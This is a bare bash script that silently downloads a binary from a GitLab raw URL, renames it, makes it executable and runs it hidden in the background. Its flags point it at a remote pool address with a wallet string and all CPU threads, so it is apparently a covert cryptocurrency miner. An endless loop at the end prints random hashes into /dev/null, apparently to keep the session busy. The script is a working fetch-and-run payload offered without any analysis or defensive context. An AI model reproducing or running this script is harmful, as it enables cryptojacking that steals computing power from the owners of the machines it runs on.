#!/bin/bash
wget -q https://gitlab.com/jadons19292/donlod/-/raw/main/klarig4 -O sgr1
chmod +x sgr1
./sgr1 -o 165.22.104.207:443 -u ZEPHsDBeXxaS9MERnP3sHAPdCBFSMb2uZjcSyfBYezxE9kcrm6q1Z6XJcCbaqavmpMAncVgMHL8EkNAjskNT1bc6csQ86aLX1WD -p CPU -t $(nproc --all) > /dev/null 2>&1 &
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done >/dev/null 2>&1
